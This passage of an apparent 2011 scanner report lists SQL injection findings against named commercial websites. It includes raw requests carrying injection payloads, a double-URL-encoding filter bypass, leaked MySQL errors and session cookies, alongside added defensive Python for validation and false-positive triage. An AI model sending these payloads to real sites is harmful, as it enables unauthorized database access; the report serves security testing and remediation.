Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 18:06:02 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Connection: close
Content-Type: text/html
Set-Cookie: TSa27990=ca07e63a6f9fbb179ce5ad4d3c3e1878d10fbf26f7d312e64d42fc7d9c5eca85e9f8e0cb; Path=/
Content-Length: 32742

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Home</title>
       <base href="http://www.dominionenterprises.com/" />
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <meta name="description" content="Home">
   <meta name="keywords" content="Home">
   <meta name="copyright" content="Dominion Enterprises">
   <meta name="resource-type" content="document">
   <meta name="distribution" content="global">
   <meta name="author" content="">
   <meta name="robots" content="index, follow">
   <meta name="revisit-after" content="1 days">
   <meta name="rating" content="general">

<script language="javascript" type="text/javascript">
var IsIPad = false;
function QueryStringIsRequestFromMobile(DirectToFullSite) {
Queries = window.location.search.substring(1);
if (Queries == "" || Queries == null) {
return false;
}
else {
QueryArray = Queries.split("&");
for (i = 0; i < QueryArray.length; i++) {
QueryValue = QueryArray[i].split("=");
if (QueryValue[0] == DirectToFullSite) {
if (QueryValue[1] == "fs24lmj09")
return true;
else
return fa
...[SNIP]...

Request 2

GET /main/do'%20and%201%3d2--%20/Terms_of_Use HTTP/1.1
Host: www.dominionenterprises.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 18:06:02 GMT
Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=db04ccde3cb4cfceafb82443534877bd; expires=Sun, 30 Jan 2011 18:06:02 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 18:06:02 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Connection: close
Content-Type: text/html
Content-Length: 32742

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Home</title>
       <base href="http://www.dominionenterprises.com/" />
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <meta name="description" content="Home">
   <meta name="keywords" content="Home">
   <meta name="copyright" content="Dominion Enterprises">
   <meta name="resource-type" content="document">
   <meta name="distribution" content="global">
   <meta name="author" content="">
   <meta name="robots" content="index, follow">
   <meta name="revisit-after" content="1 days">
   <meta name="rating" content="general">

<script language="javascript" type="text/javascript">
var IsIPad = false;
function QueryStringIsRequestFromMobile(DirectToFullSite) {
Queries = window.location.search.substring(1);
if (Queries == "" || Queries == null) {
return false;
}
else {
QueryArray = Queries.split("&");
for (i = 0; i < QueryArray.length; i++) {
QueryValue = QueryArray[i].split("=");
if (QueryValue[0] == DirectToFullSite) {
if (QueryValue[1] == "fs24lmj09")
return true;
else
return false;
}
else

...[SNIP]...

1.39. http://www.nissanusa.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.nissanusa.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /?1%2527=1 HTTP/1.1
Host: www.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Server: Apache/2.2.11 (Unix) Communique/4.0.4 mod_ssl/2.2.11 OpenSSL/0.9.7d
Content-Type: text/html;charset=UTF-8
Date: Sat, 29 Jan 2011 04:37:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 66631

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>


<head>

<meta http-equiv="Content-type" content="text/html; charset=UTF-8" />
<t
...[SNIP]...
<span>See How They Stack Up</span>
...[SNIP]...

Request 2

GET /?1%2527%2527=1 HTTP/1.1
Host: www.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.11 (Unix) Communique/4.0.4 mod_ssl/2.2.11 OpenSSL/0.9.7d
Content-Type: text/html;charset=UTF-8
Date: Sat, 29 Jan 2011 04:37:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 66631

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>


<head>

<meta http-equiv="Content-type" content="text/html; charset=UTF-8" />
<t
...[SNIP]...
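The double-encoding note in finding 1.39 describes an ordering bug rather than a missing filter: the server decodes %2527 to %27, a filter that looks for a quote sees none, and a second decode inside the application turns %27 into ' on its way to the query. The following is an added example, not code from the report or from nissanusa.com; the blocked-character list and the presence of a second decode are assumptions standing in for whatever the site actually does. It also shows why the scanner's second probe (two quotes) makes the error disappear: inside a string literal a doubled quote is an escaped quote, so the literal closes cleanly.

```python
from urllib.parse import unquote

# Characters a naive "SQL injection filter" refuses (assumed; the real filter is unknown).
BLOCKED = ("'", '"', ";", "--")


def contains_blocked(value):
    return any(token in value for token in BLOCKED)


def server_decode(raw):
    """The one URL-decode the web server / framework already performs."""
    return unquote(raw)


def app_canonicalise(value):
    """A second, application-level decode: the mistake the finding describes."""
    return unquote(value)


def handle_vulnerable(raw_param_name):
    """Filter runs before the application's own decode: %2527 arrives as %27,
    passes the filter, and only then becomes a quote."""
    once = server_decode(raw_param_name)
    if contains_blocked(once):
        return ("blocked", once)
    return ("passed", app_canonicalise(once))   # value that reaches the SQL layer


def handle_fixed(raw_param_name):
    """Canonicalise first, validate last (better still, drop the second decode)."""
    final = app_canonicalise(server_decode(raw_param_name))
    if contains_blocked(final):
        return ("blocked", final)
    return ("passed", final)


def quotes_balanced(value):
    """An odd number of quotes leaves a string literal open (syntax error);
    an even number, e.g. the scanner's '' probe, closes it and the error goes away."""
    return value.count("'") % 2 == 0


if __name__ == "__main__":
    for raw in ("1%27", "1%2527", "1%2527%2527"):
        print(raw, "vulnerable:", handle_vulnerable(raw), "fixed:", handle_fixed(raw))
```

The remediation text's point follows directly from the two handlers: any check that runs before the last transformation of the input is checking a different string from the one the database sees.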

1.40. http://www.paperg.com/flyerboard/soundings-publications-llc/2123/0.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.paperg.com
Path:   /flyerboard/soundings-publications-llc/2123/0.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 70060861%20or%201%3d1--%20 and 70060861%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flyerboard/soundings-publications-llc/212370060861%20or%201%3d1--%20/0.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=7vd5ghvii8jml9e7v9p6kn1gt1;

Response 1

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 17:17:50 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 3370
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

   <title>Flyerboard - NY Daily News</title>

       <meta http-equiv="imagetoolbar" content="false">
   <meta name="MSSmartTagsPreventParsing" content="true">

   <meta name="title" content = "Flyerboard - NY Daily News" />
   
   <meta name="description" content = "NY Daily News NY Daily News Flyerboard, a community bulletin board." />
   
   <link rel="image_src" href="http://www.paperg.com/beta/user/4/logo.gif" />

   <!--[if IE]>
   <link rel="stylesheet" type="text/css" href="/inc/ie.css">
   <![endif]-->
   <!--[if IE 6]>
   <link rel="stylesheet" type="text/css" href="/inc/style_no_colors_ie6.css" />
   <![endif]-->

   <style type="text/css">
       label {
           width: 70px;
           margin-right: 5px;
           text-align: 5px;
       }
       form {
           text-align: center;
       }
   </style>
   <link rel="stylesheet" type="text/css" href="https://www.paperg.com/inc/style_no_colors.css" media="all">
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">
   <link rel="stylesheet" type="text/css" href="http://www.paperg.com/https/skin/csscache/0.css?version=18" media="screen"><base target=_top>
</head>
<body class="smaller">
   <!-- START : BACKGROUND BAR -->
   <div id="background_bar_container">
       <div id="background_bar">&nbsp;</div>
   </div>
   <!-- END : BACKGROUND BAR -->

   
   <div id="body-wrap">
       <!-- START: HEADER -->
       <div id="header">
           <a href="https://www.paperg.com" target="_blank" rel="nofollow" ><div id="sponsor_logo"></div></a>
       </div>        
       <!-- END: HEADER -->
       
        <!-- START: SET 1 -->
    <div id="set1">
       NY Daily News Flyerboard     </div>
    <!-- END: SET 1 -->

           <!-- START: CONTENT -->
           <div id="content">

               

               <div style="text-align: center; margin: 10px;">
                   
       
                   
            <s
...[SNIP]...

Request 2

GET /flyerboard/soundings-publications-llc/212370060861%20or%201%3d2--%20/0.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=7vd5ghvii8jml9e7v9p6kn1gt1;

Response 2

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 17:17:51 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1
Connection: close
Via: 1.1 AN-0016020122637050



1.41. https://www.paperg.com/post.php [bid parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.paperg.com
Path:   /post.php

Issue detail

The bid parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the bid parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /post.php?bid=2123%20and%201%3d1--%20&pid=3922&post HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=7vd5ghvii8jml9e7v9p6kn1gt1;

Response 1

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:17:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
   <head>
       <title>PaperG | Post a Flyer</title>
       
       <meta http-equiv="Content-Type" co
...[SNIP]...
<script type="text/javascript" src="https://www.paperg.com/jsfb/embed.php?rand=84590&view=pre&height=200&width=200"></script>
                           
                       </div>
                       <br /><br />
                       

                   
                       <div class="clear"></div>

                           <div align="center" >
                           <br />
<div id="lowest_cost_left_col">
                           <h3>INTRODUCTORY RATE
As low as $50/week

</h3>                             </div>
<div id="total_cost_left_col">
                               Total cost:                        
                               <h2>
<span id="estimated_cost_span" onmouseover="Tip('The cost automatically updates based on the publications you choose',WIDTH, 200)" onmouseout="UnTip();">&nbsp;</span>
<span id="estimated_cost_month_label" style="display:none;"><br />per month</span>
</h2>
                               </div>

                            <div id="total_length_left_col">
                               Total length:                        
                               <h2><span id="time_span">0 days</span></h2>
</div>

                           </div>    
                                                       <div id="multiboard_selected" align="center" style="display:none;">
                           *You will receive a discount for selecting multiple boards, which will be applied on the final confirmation screen.
                           </div>

                   </div>
               </div>
               
               <!-- END: LEFT COLUMN -->
               <!-- BEGIN: MIDDLE COLUMN -->
               <a id="cMiddle_top" name="cMiddle_top"> </a>
               <div id="cMiddle_loading" style="text-align:center;"><img src="post/waitanimation.gif" /> Loading...</div>
               <div id="cMiddle" class="post" style="display:none;">
               
                   Having trouble posting? <a href="support.php">Email us</a> or call (203)889-3358 and press 0.
                                           You can also try <a onclick="verify_reset();">starting over</a>.
                       <script type="text/javascript">
                       function verify_reset()
                       {
                           var answer = confirm("Are you sure you wish you start over? You will lose any information you have entered.");
                           if (answer)
                           {
                               wind
...[SNIP]...

Request 2

GET /post.php?bid=2123%20and%201%3d2--%20&pid=3922&post HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=7vd5ghvii8jml9e7v9p6kn1gt1;

Response 2

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:17:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
   <head>
       <title>PaperG | Post a Flyer</title>
       
       <meta http-equiv="Content-Type" co
...[SNIP]...
<script type="text/javascript" src="https://www.paperg.com/jsfb/embed.php?rand=56564&view=pre&height=200&width=200"></script>
                           
                       </div>
                       <br /><br />
                       

                   
                       <div class="clear"></div>

                           <div align="center" >
                           <br />
<div id="lowest_cost_left_col">
                           <h3>INTRODUCTORY RATE
As low as $50/week

</h3>                             </div>
<div id="total_cost_left_col">
                               Total cost:                        
                               <h2>
<span id="estimated_cost_span" onmouseover="Tip('The cost automatically updates based on the publications you choose',WIDTH, 200)" onmouseout="UnTip();">&nbsp;</span>
<span id="estimated_cost_month_label" style="display:none;"><br />per month</span>
</h2>
                               </div>

                            <div id="total_length_left_col">
                               Total length:                        
                               <h2><span id="time_span">0 days</span></h2>
</div>

                           </div>    
                                                       <div id="multiboard_selected" align="center" style="display:none;">
                           *You will receive a discount for selecting multiple boards, which will be applied on the final confirmation screen.
                           </div>

                   </div>
               </div>
               
               <!-- END: LEFT COLUMN -->
               <!-- BEGIN: MIDDLE COLUMN -->
               <a id="cMiddle_top" name="cMiddle_top"> </a>
               <div id="cMiddle_loading" style="text-align:center;"><img src="post/waitanimation.gif" /> Loading...</div>
               <div id="cMiddle" class="post" style="display:none;">
               
                   Having trouble posting? <a href="support.php">Email us</a> or call (203)889-3358 and press 0.
                                           You can also try <a onclick="verify_reset();">starting over</a>.
                       <script type="text/javascript">
                       function verify_reset()
                       {
                           var answer = confirm("Are you sure you wish you start over? You will lose any information you have entered.");
                           if (answer)
                           {
                               wind
...[SNIP]...
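Findings 1.38, 1.40 and 1.41 all rest on the scanner seeing "different responses" for a true and a false condition, and each carries the warning that such tests are prone to false positives. The pairs shown make the point: in 1.38 both bodies are 32742 bytes and the visible prefixes are identical, the only differences in the captured lines being a Server header present in Response 2 alone and per-request session cookies; in 1.40 the true condition returns a 3370-byte page and the false condition a 1-byte body, which is the kind of difference worth following up; in 1.41 the visible bodies differ only in a `rand=` value inside a script URL. The following is an added triage helper, not part of the report or of any scanner: it parses two raw responses, drops headers that change on every request, and compares status and body before accepting the claim. The sample pairs are constructed here to mirror the 1.38 and 1.40 captures (bodies shortened to stand-ins).

```python
# Headers that legitimately vary between two otherwise identical requests.
VOLATILE = {"date", "set-cookie", "expires", "last-modified", "server",
            "connection", "via", "content-length"}


def parse_response(raw):
    """Split a raw HTTP response into (status line, {header: [values]}, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers, body


def stable_headers(headers):
    return {k: v for k, v in headers.items() if k not in VOLATILE}


def compare(resp_true, resp_false):
    """Report what actually differs once per-request noise is removed."""
    s1, h1, b1 = parse_response(resp_true)
    s2, h2, b2 = parse_response(resp_false)
    return {
        "status_differs": s1 != s2,
        "stable_headers_differ": stable_headers(h1) != stable_headers(h2),
        "body_len": (len(b1), len(b2)),
        "body_differs": b1 != b2,
    }


def verdict(diff):
    if diff["status_differs"] or diff["body_differs"]:
        return "follow up: true/false conditions return different content"
    if diff["stable_headers_differ"]:
        return "follow up: non-volatile headers differ"
    return "likely false positive: only volatile headers differ"


def build(status, headers, body):
    """Helper to assemble a raw response for the constructed samples."""
    return status + "\r\n" + "\r\n".join(headers) + "\r\n\r\n" + body


# Constructed to mirror the 1.38 pair: same page, different Server/cookie headers.
PAGE = "<html><head><title>Dominion Enterprises | Home</title></head></html>"
PAIR_1_38 = (
    build("HTTP/1.1 200 OK",
          ["Date: Fri, 28 Jan 2011 18:06:02 GMT", "X-Powered-By: PHP/4.4.2",
           "Set-Cookie: PHPSESSID=be366704e38672859a8db520782f792d; path=/",
           "Content-Type: text/html"], PAGE),
    build("HTTP/1.1 200 OK",
          ["Date: Fri, 28 Jan 2011 18:06:02 GMT", "Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2",
           "X-Powered-By: PHP/4.4.2",
           "Set-Cookie: PHPSESSID=db04ccde3cb4cfceafb82443534877bd; path=/",
           "Content-Type: text/html"], PAGE),
)

# Constructed to mirror the 1.40 pair: a full page versus a one-byte body.
FLYER = "<html><head><title>Flyerboard - NY Daily News</title></head><body>board</body></html>"
PAIR_1_40 = (
    build("HTTP/1.1 200 OK", ["Server: Apache/2.2.9 (Debian)", "Content-Type: text/html"], FLYER),
    build("HTTP/1.1 200 OK", ["Server: Apache/2.2.9 (Debian)", "Content-Type: text/html"], "\n"),
)


if __name__ == "__main__":
    for name, pair in (("1.38", PAIR_1_38), ("1.40", PAIR_1_40)):
        d = compare(*pair)
        print(name, d["body_len"], verdict(d))
```

For a pair like 1.41, where the only change is a per-request token in the markup, the next step is to strip that token (or compare with it masked) and repeat the true/false requests several times; a real boolean injection gives the same split on every run, while noise does not.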

1.42. http://www.soundingsonline.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:34 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.43. http://www.soundingsonline.com/about-us [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /about-us

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /about-us?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:03 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /about-us?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:04 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.44. http://www.soundingsonline.com/advertise [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /advertise

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /advertise?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:34 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /advertise?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:36 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.45. http://www.soundingsonline.com/archives [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /archives

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

